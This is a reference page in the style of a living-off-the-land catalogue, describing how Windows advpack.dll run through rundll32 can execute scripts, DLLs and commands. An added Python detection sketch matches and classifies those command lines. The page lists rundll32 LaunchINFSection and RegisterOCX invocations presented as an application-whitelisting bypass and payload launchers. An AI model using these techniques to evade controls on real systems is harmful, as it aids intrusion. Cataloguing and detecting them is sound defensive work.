~/Windows# cat Advpack.dll.md

Utility for installing software and drivers with rundll32.exe

Paths:

c:\windows\system32\advpack.dll
c:\windows\syswow64\advpack.dll

Detection:

AWL bypass

Execute the (local or remote) .wsh/.sct script specified in the .inf file, using scrobj.dll, by calling an information file directive (section name specified).

rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,

Execute the (local or remote) .wsh/.sct script specified in the .inf file, using scrobj.dll, by calling an information file directive (DefaultInstall section implied).

rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1,

Execute

Launch a DLL payload by calling the RegisterOCX function.

rundll32.exe advpack.dll,RegisterOCX test.dll

Launch an executable by calling the RegisterOCX function.

rundll32.exe advpack.dll,RegisterOCX calc.exe

Launch a command line by calling the RegisterOCX function.

rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"
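
A detection sketch for the command lines listed above, added here as an example and not part of the original page: it matches process-creation command lines in which rundll32 calls advpack.dll's LaunchINFSection or RegisterOCX, and labels each hit with the page's category. The names `classify`, `scan` and `SAMPLE_EVENTS` are hypothetical, the sample events are constructed, and treating any export name that begins with those two names as a match is an assumption.

```python
import re

# rundll32[.exe] [path\]advpack[.dll] , <export> <args>; the comma may be
# followed by spaces and either path may be quoted.
PATTERN = re.compile(
    r'(?i)\brundll32(?:\.exe)?"?\s+"?(?P<dll>[^",]*\badvpack(?:\.dll)?)"?\s*,\s*'
    r'(?P<export>(?:LaunchINFSection|RegisterOCX)\w*)\s*(?P<args>.*)$'
)

def classify(cmdline):
    """Return a finding dict for an advpack.dll proxy execution, else None."""
    m = PATTERN.search(cmdline.strip())
    if not m:
        return None
    export, args = m["export"], m["args"].strip()
    if export.lower().startswith("launchinfsection"):
        # Arguments are "<inf>,<section>,<flags>,"; an empty section means DefaultInstall.
        parts = [p.strip().strip('"') for p in args.split(",")]
        section = parts[1] if len(parts) > 1 and parts[1] else "DefaultInstall"
        return {"category": "AWL bypass", "export": export,
                "inf": parts[0], "section": section}
    target = args.strip('"')
    first = target.split()[0].lower() if target else ""
    if first.endswith((".dll", ".ocx")):
        kind = "dll"
    elif len(target.split()) > 1:
        kind = "command line"
    else:
        kind = "executable"
    return {"category": "Execute", "export": export, "target": target, "kind": kind}

# Constructed sample events: the page's five command lines, one quoted
# full-path variant, and one unrelated rundll32 call that must not match.
SAMPLE_EVENTS = [
    r'rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,',
    r'rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1,',
    r'rundll32.exe advpack.dll,RegisterOCX test.dll',
    r'rundll32.exe advpack.dll,RegisterOCX calc.exe',
    r'rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"',
    r'"C:\Windows\SysWOW64\rundll32.exe" "c:\windows\syswow64\advpack.dll",RegisterOCX test.dll',
    r'rundll32.exe shell32.dll,Control_RunDLL desk.cpl',
]

def scan(events):
    """Return (command line, finding) pairs for every event that matches."""
    return [(e, f) for e in events if (f := classify(e))]

if __name__ == "__main__":
    for event, finding in scan(SAMPLE_EVENTS):
        print(finding, "<-", event)
```

The pattern tolerates the missing `.exe` and the space after the comma seen in the last command on the page, so neither variation slips past a literal string match.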